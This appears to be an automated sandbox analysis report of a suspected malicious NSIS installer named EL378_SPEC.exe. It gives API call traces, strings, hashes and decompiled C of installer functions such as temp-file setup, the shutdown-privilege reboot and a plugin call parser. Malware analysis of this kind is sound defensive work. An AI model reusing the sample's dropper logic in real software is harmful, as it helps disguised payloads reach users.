lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\EL378_SPEC.exe",00000000,00000000), ref: 00403AFB
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B23
DeleteFileW.KERNEL32(0042B538,0042B538,?,user32::EnumWindows(i r1 ,i 0),?), ref: 00403B76
CopyFileW.KERNEL32(C:\Users\user\Desktop\EL378_SPEC.exe,0042B538,?), ref: 00403B88
CloseHandle.KERNEL32(00000000,0042B538,0042B538,?,0042B538,00000000), ref: 00403BC1

Part of subcall function 00405E1E: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00405E26
Part of subcall function 00405E1E: GetLastError.KERNEL32 ref: 00405E30

OleUninitialize.OLE32(00000000), ref: 00403BEF
ExitProcess.KERNEL32 ref: 00403C06
GetCurrentProcess.KERNEL32(?,?), ref: 00403C1C
OpenProcessToken.ADVAPI32(00000000), ref: 00403C23
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C38
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C5B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C80

Part of subcall function 004065F6: CharNextW.USER32(?,004038BC,"C:\Users\user\Desktop\EL378_SPEC.exe",?,"C:\Users\user\Desktop\EL378_SPEC.exe",00000000), ref: 0040660C

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403708
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 004039A0, 00403A8F, 00403B29, 00403B37
user32::EnumWindows(i r1 ,i 0), xrefs: 00403B45
Error launching installer, xrefs: 00403A6F
C:\Users\user\Desktop, xrefs: 00403AF1, 00403B32
C:\Users\user\Desktop\EL378_SPEC.exe, xrefs: 00403B83
NSIS Error, xrefs: 00403862
TMP, xrefs: 00403A08
Low, xrefs: 004039EE
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 00403A9A
C:\Users\user\AppData\Local\Temp\, xrefs: 004039B0, 004039B5, 004039CB, 004039D7, 004039E6, 004039F3, 004039FF, 00403A07, 00403AC3, 00403AD8, 00403AE7, 00403AF6, 00403B09, 00403B1E, 00403BD6
1033, xrefs: 00403A22
~nsu, xrefs: 00403ABE
SeShutdownPrivilege, xrefs: 00403C32
\Temp, xrefs: 004039D2
UXTHEME, xrefs: 004037F0, 004037F5, 004037FB
.tmp, xrefs: 00403AE2
TEMP, xrefs: 00403A00
"C:\Users\user\Desktop\EL378_SPEC.exe", xrefs: 00403878, 004038AE, 004038B6, 00403A44, 00403A50

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\EL378_SPEC.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\Desktop$C:\Users\user\Desktop\EL378_SPEC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
API String ID: 1152188737-3773869106
Opcode ID: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
Instruction ID: bd20618887128fe8ff831b6fc98b417d690d9367272f1fc6873584cad7b34aa2
Opcode Fuzzy Hash: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
Instruction Fuzzy Hash: 00D134B12043116AE7207F659C46B2B3AACAB4474EF41453FF586B62D2D7BC9D40CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00404B30() {
				struct HMENU__* _t63;
				WCHAR* _t64;
				int _t68;
				void* _t76;
				signed int _t78;
				short _t79;
				short _t80;
				int _t82;
				void* _t97;
				intOrPtr _t100;
				long _t114;
				struct HWND__* _t128;
				struct HWND__* _t130;
				struct HWND__* _t131;
				unsigned int _t132;
				int _t135;
				long _t136;
				int _t138;
				signed int _t140;
				short* _t141;
				int _t144;
				int _t148;
				void* _t149;
				long _t150;
				void* _t151;
				long _t152;
				void* _t153;

				_t128 =  *0x4349e8;
				_t136 =  *(_t153 + 0x64);
				if(_t136 != 0x110) {
					if(_t136 != 0x405) {
						if(_t136 != 0x111) {
							if(_t136 != 0x404) {
								if(_t136 != 0x7b ||  *(_t153 + 0x68) != _t128) {
									L14:
									return E0040575B(_t136,  *(_t153 + 0x6c),  *(_t153 + 0x6c));
								} else {
									_t144 = 0;
									_t148 = SendMessageW(_t128, 0x1004, 0, 0);
									 *(_t153 + 0x64) = _t148;
									if(_t148 <= 0) {
										L37:
										return 0;
									}
									_t63 = CreatePopupMenu();
									_push(0xffffffe1);
									_push(0);
									 *(_t153 + 0x70) = _t63;
									_t64 = E00405EBA();
									_t138 = 1;
									AppendMenuW( *(_t153 + 0x74), 0, 1, _t64);
									_t132 =  *(_t153 + 0x6c);
									_t135 = _t132;
									_t68 = _t132 >> 0x10;
									if(_t132 == 0xffffffff) {
										GetWindowRect(_t128, _t153 + 0x10);
										_t135 =  *(_t153 + 0x10);
										_t68 =  *(_t153 + 0x14);
									}
									if(TrackPopupMenu( *(_t153 + 0x80), 0x180, _t135, _t68, _t144,  *(_t153 + 0x64), _t144) == _t138) {
										 *(_t153 + 0x28) = _t144;
										 *(_t153 + 0x34) = 0x42bd48;
										 *((intOrPtr*)(_t153 + 0x38)) = 0x1000;
										do {
											_t148 = _t148 - 1;
											_t138 = _t138 + 2 + SendMessageW(_t128, 0x1073, _t148, _t153 + 0x20);
										} while (_t148 != 0);
										OpenClipboard(_t144);
										EmptyClipboard();
										_t149 = GlobalAlloc(0x42, _t138 + _t138);
										 *(_t153 + 0x64) = _t149;
										_t76 = GlobalLock(_t149);
										_t150 =  *(_t153 + 0x64);
										_t140 = _t76;
										do {
											 *(_t153 + 0x34) = _t140;
											_t78 = SendMessageW(_t128, 0x1073, _t144, _t153 + 0x20);
											_t141 = _t140 + _t78 * 2;
											_t79 = 0xd;
											 *_t141 = _t79;
											_t80 = 0xa;
											 *((short*)(_t141 + 2)) = _t80;
											_t140 = _t141 + 4;
											_t144 = _t144 + 1;
										} while (_t144 < _t150);
										_t151 =  *(_t153 + 0x60);
										GlobalUnlock(_t151);
										_push(_t151);
										_t82 = 0xd;
										SetClipboardData(_t82, ??);
										CloseClipboard();
									}
									goto L37;
								}
							}
							if( *0x4349ec == 0) {
								ShowWindow( *0x4349f8, "true");
								if( *0x435acc == 0) {
									E00405D3A( *((intOrPtr*)( *0x42dd4c + 0x34)), 0);
								}
								_push("true");
							} else {
								 *0x42bd44 = 2;
								_push("true");
							}
							E00405958();
							goto L14;
						}
						if( *(_t153 + 0x68) == 0x403) {
							ShowWindow( *0x4349e4, 0);
							ShowWindow(_t128, "true");
							E00405503(_t128);
						}
						goto L14;
					}
					_t97 = CreateThread(0, 0, E00405864, GetDlgItem( *(_t153 + 0x6c), 0x3ec), 0, _t153 + 0x64); // executed
					CloseHandle(_t97); // executed
					goto L14;
				}
				 *(_t153 + 0x34) =  *(_t153 + 0x34) | 0xffffffff;
				 *(_t153 + 0x20) = 2;
				 *((intOrPtr*)(_t153 + 0x24)) = 0;
				 *((intOrPtr*)(_t153 + 0x2c)) = 0;
				 *((intOrPtr*)(_t153 + 0x30)) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t100 =  *0x435a10;
				_t152 =  *(_t100 + 0x5c);
				 *(_t153 + 0x70) =  *(_t100 + 0x60);
				 *0x4349e4 = GetDlgItem( *(_t153 + 0x64), 0x403);
				 *0x4349c8 = GetDlgItem( *(_t153 + 0x64), 0x3ee);
				_t130 = GetDlgItem( *(_t153 + 0x64), 0x3f8);
				 *0x4349e8 = _t130;
				E00405503( *0x4349e4);
				 *0x4349cc = E00405835("true");
				 *0x4349d0 = 0;
				GetClientRect(_t130, _t153 + 0x10);
				 *(_t153 + 0x28) =  *((intOrPtr*)(_t153 + 0x18)) - GetSystemMetrics(2);
				SendMessageW(_t130, 0x1061, 0, _t153 + 0x20); // executed
				SendMessageW(_t130, 0x1036, 0x4000, 0x4000); // executed
				if(_t152 >= 0) {
					SendMessageW(_t130, 0x1001, 0, _t152);
					SendMessageW(_t130, 0x1026, 0, _t152);
				}
				_t114 =  *(_t153 + 0x68);
				if(_t114 >= 0) {
					SendMessageW(_t130, 0x1024, 0, _t114);
				}
				_push( *((intOrPtr*)( *(_t153 + 0x6c) + 0x30)));
				_push(0x1b);
				E0040551A( *(_t153 + 0x68));
				if(( *0x435a0c & 0x00000003) != 0) {
					ShowWindow( *0x4349e4, 0);
					if(( *0x435a0c & 0x00000002) != 0) {
						 *0x4349e4 = 0;
					} else {
						ShowWindow(_t130, "true");
					}
					E00405503( *0x4349c8);
				}
				_t131 = GetDlgItem( *(_t153 + 0x64), 0x3ec);
				SendMessageW(_t131, 0x401, 0, 0x75300000);
				if(( *0x435a0c & 0x00000004) != 0) {
					SendMessageW(_t131, 0x409, 0,  *(_t153 + 0x68));
					SendMessageW(_t131, 0x2001, 0, _t152);
				}
				goto L37;
			}

0x00404b34
0x00404b3d
0x00404b47
0x00404cdf
0x00404d2b
0x00404d5c
0x00404da7
0x00404d0d
0x00000000
0x00404db7
0x00404db7
0x00404dc7
0x00404dc9
0x00404dcf
0x00404ee5
0x00000000
0x00404ee5
0x00404dd5
0x00404ddb
0x00404ddd
0x00404dde
0x00404de2
0x00404dea
0x00404df1
0x00404df7
0x00404e00
0x00404e03
0x00404e07
0x00404e0f
0x00404e15
0x00404e19
0x00404e19
0x00404e39
0x00404e3f
0x00404e43
0x00404e4b
0x00404e53
0x00404e57
0x00404e69
0x00404e6b
0x00404e70
0x00404e76
0x00404e88
0x00404e8b
0x00404e8f
0x00404e95
0x00404e99
0x00404e9b
0x00404e9f
0x00404eab
0x00404eb3
0x00404eb6
0x00404eb7
0x00404ebc
0x00404ebd
0x00404ec1
0x00404ec4
0x00404ec5
0x00404ec9
0x00404ece
0x00404ed4
0x00404ed7
0x00404ed9
0x00404edf
0x00404edf
0x00000000
0x00404e39
0x00404da7
0x00404d65
0x00404d82
0x00404d8f
0x00404d9b
0x00404d9b
0x00404da0
0x00404d67
0x00404d67
0x00404d71
0x00404d71
0x00404d73
0x00000000
0x00404d73
0x00404d37
0x00404d47
0x00404d4c
0x00404d4f
0x00404d4f
0x00000000
0x00404d37
0x00404d00
0x00404d07
0x00000000
0x00404d07
0x00404b4d
0x00404b56
0x00404b68
0x00404b6c
0x00404b70
0x00404b74
0x00404b7e
0x00404b7f
0x00404b80
0x00404b81
0x00404b82
0x00404b87
0x00404b8d
0x00404b9c
0x00404bac
0x00404bb9
0x00404bbb
0x00404bc1
0x00404bcd
0x00404bd8
0x00404bde
0x00404bfc
0x00404c08
0x00404c17
0x00404c1b
0x00404c25
0x00404c2f
0x00404c2f
0x00404c31
0x00404c37
0x00404c41
0x00404c41
0x00404c47
0x00404c4a
0x00404c50
0x00404c5c
0x00404c65
0x00404c72
0x00404c7f
0x00404c74
0x00404c77
0x00404c77
0x00404c8b
0x00404c8b
0x00404ca5
0x00404cad
0x00404cb6
0x00404cc8
0x00404cd2
0x00404cd2
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00404B91
GetDlgItem.USER32(?,000003EE), ref: 00404BA1
GetClientRect.USER32(00000000,?), ref: 00404BDE
GetSystemMetrics.USER32(00000002), ref: 00404BE6
SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C08
SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C17
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C25
SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C2F

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C41
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C65
ShowWindow.USER32(00000000,?), ref: 00404C77
GetDlgItem.USER32(?,000003EC), ref: 00404C99
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CAD
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CC8
SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CD2
ShowWindow.USER32(00000000), ref: 00404D47
ShowWindow.USER32(?,?), ref: 00404D4C
GetDlgItem.USER32(?,000003F8), ref: 00404BB1

Part of subcall function 00405503: SendMessageW.USER32(?,?,?,00405338), ref: 00405511

GetDlgItem.USER32(?,000003EC), ref: 00404CF2
CreateThread.KERNEL32(00000000,00000000,Function_00005864,00000000), ref: 00404D00
CloseHandle.KERNELBASE(00000000), ref: 00404D07
ShowWindow.USER32(?), ref: 00404D82
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DC1
CreatePopupMenu.USER32 ref: 00404DD5
AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DF1
GetWindowRect.USER32(?,?), ref: 00404E0F
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E31
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E60
OpenClipboard.USER32(00000000), ref: 00404E70
EmptyClipboard.USER32 ref: 00404E76
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E82
GlobalLock.KERNEL32(00000000), ref: 00404E8F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EAB
GlobalUnlock.KERNEL32(?), ref: 00404ECE
SetClipboardData.USER32(0000000D,?), ref: 00404ED9
CloseClipboard.USER32 ref: 00404EDF

Strings

Tetraspgia Setup: Installing, xrefs: 00404E43

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
String ID: Tetraspgia Setup: Installing
API String ID: 2901622961-546952963
Opcode ID: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction ID: b8a9fdf254180bfaf0004a99ba51f40fd9d2112bd445e4f5698f4cfe216f0b8a
Opcode Fuzzy Hash: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction Fuzzy Hash: 45A1BEB1604304BBE720AF61DD89F9B7FA9FFC4754F00092AF645A62E1C7789840CB69

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC2351 Relevance: 14.2, APIs: 9, Instructions: 657
stringmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E6ECC2351() {
				void _v4;
				void* _v8;
				signed short _v12;
				signed int _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				short* _t247;
				signed short* _t249;
				signed int _t250;
				signed int _t254;
				void* _t260;
				struct HINSTANCE__* _t261;
				signed int _t262;
				signed int _t264;
				void* _t265;
				signed short _t267;
				signed int _t271;
				void* _t272;
				signed int* _t273;
				void* _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t291;
				void* _t293;
				signed int _t294;
				void* _t298;
				signed int _t299;
				signed short* _t300;
				void* _t303;
				signed int _t310;
				signed int _t311;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				short* _t324;
				signed int _t325;
				signed short* _t329;
				signed int _t331;
				WCHAR* _t332;
				signed short* _t333;
				signed int _t345;
				void* _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				void* _t353;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				void* _t360;
				void* _t361;
				void* _t362;
				void* _t363;
				signed int _t369;
				signed int _t374;
				void* _t375;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed short* _t387;
				void* _t388;
				void* _t390;
				signed short* _t391;
				short* _t392;
				WCHAR* _t393;
				WCHAR* _t394;
				struct HINSTANCE__* _t395;
				signed int _t397;
				signed int _t398;
				signed short _t399;
				void _t400;
				void* _t402;
				void* _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;

				_t398 = 0;
				_v32 = 0;
				_v52 = 0;
				_t390 = 0;
				_v28 = 0;
				_v56 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_t247 = E6ECC12F8();
				_v40 = _t247;
				_t324 = _t247;
				_v20 = E6ECC12F8();
				_t249 = E6ECC1593();
				_t329 = _t249;
				_v8 = _t249;
				_v60 = _t329;
				_t391 = _t249;
				_v44 = _t329;
				_v4 = 2;
				while(1) {
					_t382 = _t398;
					if(_t398 != 0 && _t390 == 0) {
						break;
					}
					_t399 =  *_t329 & 0x0000ffff;
					_t250 = _t399 & 0x0000ffff;
					_v12 = _t399;
					_t331 = _t250;
					if(_t331 == 0) {
						_t175 =  &_v52;
						 *_t175 = _v52 | 0xffffffff;
						__eflags =  *_t175;
						L132:
						_t400 = _v32;
						L133:
						_t383 = _t382;
						if(_t383 == 0) {
							 *_t324 = 0;
							__eflags = _t390;
							if(_t390 != 0) {
								_t384 = 0;
								__eflags = 0;
							} else {
								_t293 = GlobalAlloc("true", 0x1ca4); // executed
								_t390 = _t293;
								_t384 = 0;
								 *(_t390 + 0x1010) = 0;
								 *((intOrPtr*)(_t390 + 0x1014)) = 0;
							}
							 *(_t390 + 0x1008) = _t384;
							_t332 = _t390 + 8;
							 *(_t390 + 0x100c) = _t384;
							_t186 = _t390 + 0x808; // 0x808
							_t392 = _t186;
							 *_t332 = 0;
							 *_t392 = 0;
							 *_t390 = _t400;
							 *(_t390 + 4) = _t384;
							_t254 = _t400 - _t384;
							__eflags = _t254;
							if(_t254 == 0) {
								__eflags = _t324 - _v40;
								if(_t324 == _v40) {
									goto L157;
								}
								_t397 = _t384;
								GlobalFree(_t390);
								_push(_v40);
								_t390 = E6ECC135A();
								__eflags = _t390;
								if(_t390 == 0) {
									goto L157;
								} else {
									goto L150;
								}
								while(1) {
									L150:
									_t284 =  *(_t390 + 0x1ca0);
									__eflags = _t284;
									if(_t284 == 0) {
										break;
									}
									_t397 = _t390;
									_t390 = _t284;
								}
								__eflags = _t397;
								if(_t397 != 0) {
									_t193 = _t397 + 0x1ca0;
									 *_t193 =  *(_t397 + 0x1ca0) & 0x00000000;
									__eflags =  *_t193;
								}
								_t285 =  *(_t390 + 0x1010);
								__eflags = _t285 & 0x00000008;
								if((_t285 & 0x00000008) == 0) {
									_t345 = 2;
									_t286 = _t285 | _t345;
									__eflags = _t286;
									 *(_t390 + 0x1010) = _t286;
								} else {
									_t390 = E6ECC1309(_t390);
									 *(_t390 + 0x1010) =  *(_t390 + 0x1010) & 0xfffffff5;
								}
								goto L157;
							} else {
								_t288 = _t254 - 1;
								__eflags = _t288;
								if(_t288 == 0) {
									L145:
									lstrcpyW(_t332, _v20);
									L146:
									_push(_v40);
									_push(_t392);
									L147:
									lstrcpyW();
									L157:
									_t333 = _v60;
									L158:
									_t324 = _v40;
									L159:
									_t398 = _v52;
									_t329 =  &(_t333[1]);
									_v60 = _t329;
									_t391 = _t329;
									_v44 = _t329;
									if(_t398 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t291 = _t288 - 1;
								__eflags = _t291;
								if(_t291 == 0) {
									goto L146;
								}
								__eflags = _t291 != 1;
								if(_t291 != 1) {
									goto L157;
								}
								goto L145;
							}
						}
						_t385 = _t383 - 1;
						if(_t385 == 0) {
							_t294 = _v28;
							if(_v24 == _t385) {
								_t294 = _t294 - 1;
							}
							 *((intOrPtr*)(_t390 + 0x1014)) = _t294;
						}
						goto L157;
					}
					_t347 = _t331 - 0x23;
					if(_t347 == 0) {
						__eflags = _t391 - _v8;
						if(_t391 <= _v8) {
							_t348 = _v52;
							L31:
							__eflags = _v36;
							if(_v36 != 0) {
								L15:
								_t349 = _t348;
								__eflags = _t349;
								if(_t349 == 0) {
									_t387 = _v60;
									while(1) {
										__eflags = _t250 - 0x22;
										if(_t250 != 0x22) {
											break;
										}
										_t387 =  &(_t387[1]);
										__eflags = _v36;
										_v60 = _t387;
										_t391 = _t387;
										if(_v36 == 0) {
											__eflags = 1;
											_v36 = 1;
											L123:
											_t333 = _v60;
											 *_t324 =  *_t333;
											_t298 = 2;
											_t324 = _t324 + _t298;
											goto L159;
										}
										_t161 =  &_v36;
										 *_t161 = _v36 & 0x00000000;
										__eflags =  *_t161;
										_t250 =  *_t387 & 0x0000ffff;
									}
									__eflags = _t250 - 0x2a;
									if(_t250 == 0x2a) {
										_t299 = 2;
										_v32 = _t299;
										goto L157;
									}
									_t402 = 0x2d;
									__eflags = _t250 - _t402;
									if(_t250 == _t402) {
										L119:
										_t350 =  *_t387 & 0x0000ffff;
										__eflags = _t350 - _t402;
										if(_t350 != _t402) {
											L124:
											_t300 =  &(_t387[1]);
											_t388 = 0x3a;
											__eflags =  *_t300 - _t388;
											if( *_t300 != _t388) {
												goto L123;
											}
											__eflags = _t350 - _t402;
											if(_t350 == _t402) {
												goto L123;
											}
											__eflags = 1;
											_v32 = 1;
											L127:
											_t333 = _t300;
											_v60 = _t333;
											__eflags = _t324 - _v40;
											if(_t324 <= _v40) {
												 *_v20 = 0;
												goto L158;
											}
											_push(_v40);
											_push(_v20);
											 *_t324 = 0;
											goto L147;
										}
										_t300 =  &(_t391[1]);
										__eflags =  *_t300 - 0x3e;
										if( *_t300 != 0x3e) {
											goto L124;
										}
										_v32 = 3;
										goto L127;
									}
									_t353 = 0x3a;
									__eflags = _t250 - _t353;
									if(_t250 != _t353) {
										goto L123;
									}
									goto L119;
								}
								_t354 = _t349 - 1;
								__eflags = _t354;
								if(_t354 == 0) {
									_t325 = _v28;
									L51:
									_t303 = _t250 + 0xffffffde;
									__eflags = _t303 - 0x55;
									if(_t303 > 0x55) {
										goto L157;
									}
									_t77 = _t303 + 0x6ecc2c69; // 0x39000010
									switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M6ECC2BDD))) {
										case 0:
											__ecx = _v40;
											__ebx = _v60;
											_push(2);
											__edx = __bp & 0x0000ffff;
											_pop(__ebp);
											while(1) {
												__ebx = __ebx + 2;
												__eax =  *__ebx & 0x0000ffff;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L90;
												}
												L89:
												__eflags =  *(__ebx + 2) - __dx;
												if( *(__ebx + 2) != __dx) {
													L94:
													__ebp = _v40;
													__eax = 0;
													__eflags = 0;
													_v60 = __ebx;
													 *__ecx = __ax;
													__esi = E6ECC12E1(_v40);
													goto L95;
												}
												L90:
												__eflags = __ax;
												if(__ax == 0) {
													goto L94;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__ebx = __ebx + 2;
													__eflags = __ebx;
												}
												__ax =  *__ebx;
												 *__ecx = __ax;
												__ecx = __ecx + __ebp;
												__ebx = __ebx + 2;
												__eax =  *__ebx & 0x0000ffff;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L90;
												}
												goto L89;
											}
										case 1:
											L48:
											_v56 = 1;
											goto L157;
										case 2:
											_v56 = _v56 | 0xffffffff;
											goto L157;
										case 3:
											_v56 = _v56 & __edx;
											__eax = 0;
											_v48 = _v48 & __edx;
											__ebx = __ebx + 1;
											__eax = 1;
											_v28 = __ebx;
											_v24 = 1;
											goto L157;
										case 4:
											__eflags = _v48 - __edx;
											if(_v48 != __edx) {
												goto L157;
											}
											__eax = _v60;
											_push(2);
											_pop(__ecx);
											__eax = _v60 - __ecx;
											_v44 = _v60 - __ecx;
											__esi = E6ECC12F8();
											__eax =  &_v44;
											_push(__esi);
											__eax = E6ECC1BCF( &_v44);
											_push(__edx);
											_push(__eax);
											__eax = E6ECC149E(__ecx);
											__esp = __esp + 0xc;
											goto L83;
										case 5:
											_v48 = _v48 + 1;
											goto L157;
										case 6:
											_push(7);
											goto L77;
										case 7:
											_push(0x19);
											goto L103;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L60;
										case 9:
											_push(0x15);
											goto L103;
										case 0xa:
											_push(0x16);
											goto L103;
										case 0xb:
											_push("true");
											goto L103;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L72;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L63;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L78;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L76;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L67;
										case 0x11:
											_push(3);
											goto L77;
										case 0x12:
											_push(0x17);
											L103:
											_pop(__esi);
											goto L104;
										case 0x13:
											__eax =  &_v44;
											__eax = E6ECC1BCF( &_v44);
											_push(0xb);
											_pop(__esi);
											__ecx = __eax + 1;
											__eflags = __eax + 1 - __esi;
											_push("true");
											_pop(__ecx);
											__esi =  >=  ? __eax + 1 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											goto L83;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L104;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L70;
										case 0x16:
											__eax = 0;
											goto L78;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L74;
										case 0x18:
											_t355 =  *((intOrPtr*)(_t390 + 0x1014));
											__eflags = _t355 - _t325;
											_push("true");
											_t306 =  <=  ? _t325 : _t355;
											_v56 = _v56 & 0;
											_v48 = _v48 & 0;
											_t326 =  <=  ? _t325 : _t355;
											_v28 =  <=  ? _t325 : _t355;
											_v32 - 3 = _t355 - (0 | _v32 == 0x00000003);
											_pop(_t309);
											_t404 =  !=  ? _t309 : _v24;
											_v24 =  !=  ? _t309 : _v24;
											goto L157;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L60:
											_push(2);
											_pop(__ecx);
											_v56 = __ecx;
											goto L78;
										case 0x1a:
											L72:
											_push(5);
											goto L77;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L63:
											_push(3);
											_pop(__esi);
											_v56 = __esi;
											goto L78;
										case 0x1c:
											__eax = 0;
											__eax = 1;
